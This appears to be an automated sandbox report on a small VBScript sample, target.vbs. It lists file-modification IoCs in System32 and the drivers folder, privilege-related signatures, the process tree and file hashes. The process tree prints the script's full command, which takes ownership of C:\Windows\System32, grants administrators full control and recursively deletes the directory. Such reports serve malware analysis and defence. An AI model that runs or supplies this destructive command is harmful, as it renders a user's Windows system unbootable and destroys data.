Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
25-05-2024 16:19
Static task
static1
Behavioral task
behavioral1
Sample
target.vbs
Resource
win7-20240419-en
General
-
Target
target.vbs
-
Size
209B
-
MD5
fe505a5e05c25e1b991d6f6094899bdf
-
SHA1
3dda3dbed85f227a9563b8b7e94b1fbfc9ec5d99
-
SHA256
dc83fb002acfc2179b1e82046f5827f14a5ed2bd58503403155b0cef21f89533
-
SHA512
c7c39c1ddcb6c4a83489b14c459f0446bd1585bf4d840e7026a08b4341584ee48381b23a182f3f7fc74c04568a6428b00ffadab5954dbd6e3f2967b805c5340f
Malware Config
Signatures
-
Drops file in Drivers directory 64 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\System32\drivers\hidusb.sys cmd.exe File opened for modification C:\Windows\System32\drivers\http.sys cmd.exe File opened for modification C:\Windows\System32\drivers\rdpbus.sys cmd.exe File opened for modification C:\Windows\System32\drivers\tdx.sys cmd.exe File opened for modification C:\Windows\System32\drivers\amdppm.sys cmd.exe File opened for modification C:\Windows\System32\drivers\msfs.sys cmd.exe File opened for modification C:\Windows\System32\drivers\mslldp.sys cmd.exe File opened for modification C:\Windows\System32\drivers\msquic.sys cmd.exe File opened for modification C:\Windows\System32\drivers\Ndu.sys cmd.exe File opened for modification C:\Windows\System32\drivers\npfs.sys cmd.exe File opened for modification C:\Windows\System32\drivers\rteth.sys cmd.exe File opened for modification C:\Windows\System32\drivers\storahci.sys cmd.exe File opened for modification C:\Windows\System32\drivers\dfsc.sys cmd.exe File opened for modification C:\Windows\System32\drivers\watchdog.sys cmd.exe File opened for modification C:\Windows\System32\drivers\srv2.sys cmd.exe File opened for modification C:\Windows\System32\drivers\csc.sys cmd.exe File opened for modification C:\Windows\System32\drivers\rspndr.sys cmd.exe File opened for modification C:\Windows\System32\drivers\srvnet.sys cmd.exe File opened for modification C:\Windows\System32\drivers\Vid.sys cmd.exe File opened for modification C:\Windows\System32\drivers\VR7DGM~1.SYS cmd.exe File opened for modification C:\Windows\System32\drivers\hidclass.sys cmd.exe File opened for modification C:\Windows\System32\drivers\gpuenergydrv.sys cmd.exe File opened for modification C:\Windows\System32\drivers\null.sys cmd.exe File opened for modification C:\Windows\System32\drivers\storqosflt.sys cmd.exe File opened for modification C:\Windows\System32\drivers\vhdmp.sys cmd.exe File opened for modification C:\Windows\System32\drivers\drmk.sys cmd.exe File opened for modification C:\Windows\System32\drivers\mrxsmb.sys cmd.exe File opened for modification C:\Windows\System32\drivers\dxgmms2.sys cmd.exe File opened for modification C:\Windows\System32\drivers\pacer.sys cmd.exe File opened for modification C:\Windows\System32\drivers\kdnic.sys cmd.exe File opened for modification C:\Windows\System32\drivers\cdrom.sys cmd.exe File opened for modification C:\Windows\System32\drivers\ks.sys cmd.exe File opened for modification C:\Windows\System32\drivers\usbehci.sys cmd.exe File opened for modification C:\Windows\System32\drivers\usbhub.sys cmd.exe File opened for modification C:\Windows\System32\drivers\afd.sys cmd.exe File opened for modification C:\Windows\System32\drivers\dxgkrnl.sys cmd.exe File opened for modification C:\Windows\System32\drivers\HdAudio.sys cmd.exe File opened for modification C:\Windows\System32\drivers\kbdclass.sys cmd.exe File opened for modification C:\Windows\System32\drivers\mouclass.sys cmd.exe File opened for modification C:\Windows\System32\drivers\mssmbios.sys cmd.exe File opened for modification C:\Windows\System32\drivers\Rtnic64.sys cmd.exe File opened for modification C:\Windows\System32\drivers\wcifs.sys cmd.exe File opened for modification C:\Windows\System32\drivers\cldflt.sys cmd.exe File opened for modification C:\Windows\System32\drivers\Diskdump.sys cmd.exe File opened for modification C:\Windows\System32\drivers\hidparse.sys cmd.exe File opened for modification C:\Windows\System32\drivers\i8042prt.sys cmd.exe File opened for modification C:\Windows\System32\drivers\ksthunk.sys cmd.exe File opened for modification C:\Windows\System32\drivers\mmcss.sys cmd.exe File opened for modification C:\Windows\System32\drivers\mouhid.sys cmd.exe File opened for modification C:\Windows\System32\drivers\portcls.sys cmd.exe File opened for modification C:\Windows\System32\drivers\afunix.sys cmd.exe File opened for modification C:\Windows\System32\drivers\monitor.sys cmd.exe File opened for modification C:\Windows\System32\drivers\netbt.sys cmd.exe File opened for modification C:\Windows\System32\drivers\nsiproxy.sys cmd.exe File opened for modification C:\Windows\System32\drivers\lltdio.sys cmd.exe File opened for modification C:\Windows\System32\drivers\cimfs.sys cmd.exe File opened for modification C:\Windows\System32\drivers\hdaudbus.sys cmd.exe File opened for modification C:\Windows\System32\drivers\tdi.sys cmd.exe File opened for modification C:\Windows\System32\drivers\vwififlt.sys cmd.exe File opened for modification C:\Windows\System32\drivers\cdfs.sys cmd.exe File opened for modification C:\Windows\System32\drivers\beep.sys cmd.exe File opened for modification C:\Windows\System32\drivers\ndiscap.sys cmd.exe File opened for modification C:\Windows\System32\drivers\PEAuth.sys cmd.exe File opened for modification C:\Windows\System32\drivers\rdbss.sys cmd.exe -
Manipulates Digital Signatures 1 IoCs
Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\System32\wintrust.dll cmd.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 3588 takeown.exe 1640 icacls.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation WScript.exe -
Loads dropped DLL 12 IoCs
Processes:
pid process 2748 2748 2748 2748 2748 2748 2748 2748 2748 2748 2748 2748 -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 3588 takeown.exe 1640 icacls.exe -
Drops file in System32 directory 64 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\System32\cdpsvc.dll cmd.exe File opened for modification C:\Windows\System32\dhcpcsvc6.dll cmd.exe File opened for modification C:\Windows\System32\cdp.dll cmd.exe File opened for modification C:\Windows\System32\fwpolicyiomgr.dll cmd.exe File opened for modification C:\Windows\System32\WaaSAssessment.dll cmd.exe File opened for modification C:\Windows\System32\winevt\Logs\MI03A7~1.EVT cmd.exe File opened for modification C:\Windows\System32\winevt\Logs\MIA934~1.EVT cmd.exe File opened for modification C:\Windows\System32\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll cmd.exe File opened for modification C:\Windows\System32\TileDataRepository.dll cmd.exe File opened for modification C:\Windows\System32\computenetwork.dll cmd.exe File opened for modification C:\Windows\System32\umpoext.dll cmd.exe File opened for modification C:\Windows\System32\AudioSrvPolicyManager.dll cmd.exe File opened for modification C:\Windows\System32\StartTileData.dll cmd.exe File opened for modification C:\Windows\System32\PhotoMetadataHandler.dll cmd.exe File opened for modification C:\Windows\System32\sppsvc.exe cmd.exe File opened for modification C:\Windows\System32\tdh.dll cmd.exe File opened for modification C:\Windows\System32\ubpm.dll cmd.exe File opened for modification C:\Windows\System32\BluetoothApis.dll cmd.exe File opened for modification C:\Windows\System32\cryptxml.dll cmd.exe File opened for modification C:\Windows\System32\dpapi.dll cmd.exe File opened for modification C:\Windows\System32\en-US\combase.dll.mui cmd.exe File opened for modification C:\Windows\System32\Windows.Security.Authentication.Web.Core.dll cmd.exe File opened for modification C:\Windows\System32\nlaapi.dll cmd.exe File opened for modification C:\Windows\System32\themeservice.dll cmd.exe File opened for modification C:\Windows\System32\cscobj.dll cmd.exe File opened for modification C:\Windows\System32\daxexec.dll cmd.exe File opened for modification C:\Windows\System32\en-US\win32spl.dll.mui cmd.exe File opened for modification C:\Windows\System32\lmhsvc.dll cmd.exe File opened for modification C:\Windows\System32\winevt\Logs\SYSTEM~1.EVT cmd.exe File opened for modification C:\Windows\System32\ncryptsslp.dll cmd.exe File opened for modification C:\Windows\System32\Windows.CloudStore.Schema.Shell.dll cmd.exe File opened for modification C:\Windows\System32\wlidprov.dll cmd.exe File opened for modification C:\Windows\System32\en-US\crypt32.dll.mui cmd.exe File opened for modification C:\Windows\System32\linkinfo.dll cmd.exe File opened for modification C:\Windows\System32\Windows.UI.Xaml.dll cmd.exe File opened for modification C:\Windows\System32\config\BBI.LOG2 cmd.exe File opened for modification C:\Windows\System32\ELSCore.dll cmd.exe File opened for modification C:\Windows\System32\NfcRadioMedia.dll cmd.exe File opened for modification C:\Windows\System32\usermgrcli.dll cmd.exe File opened for modification C:\Windows\System32\wuapi.dll cmd.exe File opened for modification C:\Windows\System32\catroot2\{F750E~1\catdb cmd.exe File opened for modification C:\Windows\System32\DWrite.dll cmd.exe File opened for modification C:\Windows\System32\winevt\Logs\MI6343~1.EVT cmd.exe File opened for modification C:\Windows\System32\vssapi.dll cmd.exe File opened for modification C:\Windows\System32\wlanapi.dll cmd.exe File opened for modification C:\Windows\System32\dllhost.exe cmd.exe File opened for modification C:\Windows\System32\localspl.dll cmd.exe File opened for modification C:\Windows\System32\RpcRtRemote.dll cmd.exe File opened for modification C:\Windows\System32\SebBackgroundManagerPolicy.dll cmd.exe File opened for modification C:\Windows\System32\winevt\Logs\MI4C58~1.EVT cmd.exe File opened for modification C:\Windows\System32\en-US\edgehtml.dll.mui cmd.exe File opened for modification C:\Windows\System32\vertdll.dll cmd.exe File opened for modification C:\Windows\System32\winevt\Logs\MI167B~1.EVT cmd.exe File opened for modification C:\Windows\System32\WPTaskScheduler.dll cmd.exe File opened for modification C:\Windows\System32\config\SYSTEM~1\AppData\Local\MICROS~1\Windows\WebCache\WEBCAC~1.JFM cmd.exe File opened for modification C:\Windows\System32\HrtfApo.dll cmd.exe File opened for modification C:\Windows\System32\en-US\elscore.dll.mui cmd.exe File opened for modification C:\Windows\System32\fltLib.dll cmd.exe File opened for modification C:\Windows\System32\usbmon.dll cmd.exe File opened for modification C:\Windows\System32\Windows.UI.Input.Inking.dll cmd.exe File opened for modification C:\Windows\System32\winevt\Logs\MIDE4D~1.EVT cmd.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\INPUT~1.INF\hidclass.sys cmd.exe File opened for modification C:\Windows\System32\msdelta.dll cmd.exe File opened for modification C:\Windows\System32\win32kbase.sys cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
takeown.exedescription pid process Token: SeTakeOwnershipPrivilege 3588 takeown.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WScript.execmd.exedescription pid process target process PID 2552 wrote to memory of 3560 2552 WScript.exe cmd.exe PID 2552 wrote to memory of 3560 2552 WScript.exe cmd.exe PID 3560 wrote to memory of 3588 3560 cmd.exe takeown.exe PID 3560 wrote to memory of 3588 3560 cmd.exe takeown.exe PID 3560 wrote to memory of 1640 3560 cmd.exe icacls.exe PID 3560 wrote to memory of 1640 3560 cmd.exe icacls.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Windows\System32 /r /d y && icacls C:\Windows\System32 /grant administrators:F /t && rmdir /s /q C:\Windows\System322⤵
- Drops file in Drivers directory
- Manipulates Digital Signatures
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32 /r /d y3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32 /grant administrators:F /t3⤵
- Possible privilege escalation attempt
- Modifies file permissions
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\System32\IPHLPAPI.DLLFilesize
224KB
MD5567a217405f41caea18f4bab50d480fd
SHA190f870f43852b3fd62110692030bd20887777c0e
SHA25641f7a696a02b5dcba85e12a4999423bdebb1215662059adae955f8081e3ffa78
SHA512a63fb148b5db3a5738142254840e007ffab7139ed2e7a672446f613e83ee8731bcad830c860e5523f69113fea938f8bb5a59147ea641bc799aff16200d90cb00
-
C:\Windows\System32\OnDemandConnRouteHelper.dllFilesize
72KB
MD51f009de6a013a282d07436241512c056
SHA1f0d37e1e76a199135e00c0a36b154b191a0950a9
SHA256c897c345c3bcf3e96589a0feeea8b6d26cf33c091ac3ee2162dd27f8a79c3ff5
SHA51257971d5df5bd9fad066378b280898e1f6e074805cc765448b99409550f97d74bf5bbd11e48e28e53f22be69cd9cd0ff58caa1e92f94fed7cbb4cd45c8f0c4d37
-
C:\Windows\System32\dhcpcsvc.dllFilesize
99KB
MD5912357f8e08213ba9cea37721b5ed46b
SHA19ac131aba943b6e80ee4b9ce9b39f943d82be583
SHA256691a7aff42d558fac26f2a9de6b47d7596b130e730597dc3aff6025cb484d4a1
SHA5127b87471adea7a0ca01097d0520c6f62c2e56fc7519fc436e5b48ab9c51df108834040ac15079a9a23e478c486ce7cb21b1b92a02f4c1ffe7b5ace6839437b253
-
C:\Windows\System32\dhcpcsvc6.dllFilesize
71KB
MD5394fb739c0f202fd65b0fea640d192f6
SHA1bee425e28c99fe5b27faf3aaed0be0ea582ef7a5
SHA256ced3c74f4960e26b648ec5360fe6b1ce47ed4f7a203d8c9798b450e8346b698e
SHA51286660097ce8f692c7eae9555a90983e9f8f9463b469286e2d0f3fc7a628370196f60ff9a639ec9bd0eada1c94ca9ce39a714df3cf1c985b23e5f23d2f2034667
-
C:\Windows\System32\mswsock.dllFilesize
408KB
MD589ca286e36756dd0dde53acd953f44dc
SHA1cbd9fd0961f47398df85ae5d89d895c3737106db
SHA256055f34466511dbeba4f082b110216ce9c1c7f056d4f1440d62d5442971a7b1cc
SHA512341051e1353eb7ea8e8b2bd2783ff1da76922fa3513db524114bb52925550dc5c4ca92c59938de498514ad696310f7e7105ba34e8340efcd2fb2f3d80cf09410
-
C:\Windows\System32\netprofm.dllFilesize
223KB
MD5fb9d4949ca739ff6ae9ff9e43809ad7d
SHA159f3d1cbd504170a0de4f6ae4b5e31b7beedb8f0
SHA256d8e0e9f86c41f8b926e5e6f9ff2952a994b24f5cb36d4fc4ae9badd06ef6dc90
SHA512b1ef2f4913033519771d8b75953e93ac3249ac8b3f5028eb7f65d8d0b8a3f0e11aab0da7454d463459e1c7517211d8fe0dbf1c68bd8e47807f921b82c504642c
-
C:\Windows\System32\npmproxy.dllFilesize
46KB
MD54476ab6612b200ceb6957ff436e10877
SHA1d56614e23a02d7939b165f44c8802b7da7196a40
SHA2567ca45c539218d4a186ee520c4afc29a931a34b2ed83fe10e3b8b23132e2ce520
SHA5123b12e9265ae3b57193ca678612b1c7e2004077bdef8fda1b050a451f53bb612baeba6f89aa1327a7bc4614d66b67ffc14475f4e41204d8cc3947fa51f0ef8c29
-
C:\Windows\System32\nsi.dllFilesize
24KB
MD53bacc52f844ea1b30b8ef8ba0d08bf0d
SHA1031070c5ae780472e409f1e49ddde124849dfa45
SHA25621293c3d3ba83ccc45135f33d2c70bffae7a347e9f0b9fd556622cef99291923
SHA512c8befa3d89234a68754683299e3c63f7b0c4465743d07ed48cecc5e0c34b9c4756f71ab29695790b7cacc382f7f9cca4b3111f9717694e4518567300920b30b8
-
C:\Windows\System32\webio.dllFilesize
586KB
MD5743dbafa395cf6a3edbddc785b3903b7
SHA17102353adab408fa68ccf1632fe8b33096b7e9d5
SHA256a0572142ce2d871319eec032cfc9397a3531dfadaa6c836ee0070878409bde94
SHA51215fdb766c1d9ad6b8a7be94042235fa87d892d4381055e9af2387fcbba8e294fe0160d74b40f0875992ffba98d3505e874ab946b5e2e68e2a46510bb84f62323
-
C:\Windows\System32\winhttp.dllFilesize
1.0MB
MD59a00e598d3dd0aea191abaf6b6825187
SHA10bb2af1b1edb22cb65398e3739e1863378b83d32
SHA256dc62a2ed8778c75b29e5be10092cfa4aecfd6f7bffdda031152f0cad704d5bca
SHA512dac9e1974a71b6d580a65062b7d7d0e17edf82f5eb3fe458c8ba7f39052fe82f9346874d7fc54f2fe523f05b0239a1c0b1eb99545a3185a8cb493b0094e50e92
-
C:\Windows\System32\winnsi.dllFilesize
34KB
MD5c552b64bad90764055c33e68ec8250f9
SHA15a52e89c3e290eadf41c3b5babf3b88bc0087299
SHA2564824fce965b9dec8d78842cdc3ebcdf8d2d2ed15de05d5007fb18c1b2de79e11
SHA512369d86b338c477f6706e80457d34abb7a0be916cba5e90d2bad664e7b5c66eb8841c2c36ca6abf70ce30bc21e23f4c63701518b3f3ff9a38b046a25eafa72c98